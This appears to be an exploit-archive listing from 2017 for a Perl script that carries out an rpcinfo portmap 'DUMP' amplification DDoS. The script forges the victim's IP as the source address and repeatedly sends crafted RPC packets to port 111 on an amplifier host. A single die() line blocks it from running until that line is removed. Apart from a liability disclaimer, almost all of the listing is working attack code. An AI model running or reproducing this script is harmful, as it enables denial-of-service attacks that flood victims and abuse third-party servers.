rpcinfo Portmap DUMP Call Amplification Distributed Denial Of Service

2017.07.05
Credit: Todor Donev
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/perl # # # rpcinfo Portmap 'DUMP' call amplification ddos # # Copyright 2017 (c) Todor Donev # todor.donev@gmail.com # https://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # # # Disclaimer: # This or previous program is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use at your own risk and educational # purpose ONLY! # # See also, UDP-based Amplification Attacks: # https://www.us-cert.gov/ncas/alerts/TA14-017A # # # use Net::RawIP; my $target = "$ARGV[0]"; my $rpcamp = "$ARGV[1]"; die("r34d 7h3 c0d3 m0r0n\n"); my $rpcinfo = pack ("H8", int(rand(0x10000000)))."\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00"; $rpcinfo .= "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; print "[ rpcinfo Portmap 'DUMP' call amplification ddos\n"; print "[ === \n"; print "[ Copyright 2017 (c) Todor Donev\n"; print "[ todor.donev\@gmail.com\n"; print "[ https://www.ethical-hacker.org/\n"; print "[ https://www.facebook.com/ethicalhackerorg\n"; my $sock = new Net::RawIP({ udp => {} }); while () { select(undef, undef, undef, 0.30); my $randsport = int(rand(65535)); $sock->set({ ip => { saddr => $target, daddr => $rpcamp}, udp => { source => $randsport, dest => 111, data => $rpcinfo} }); $sock->send; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top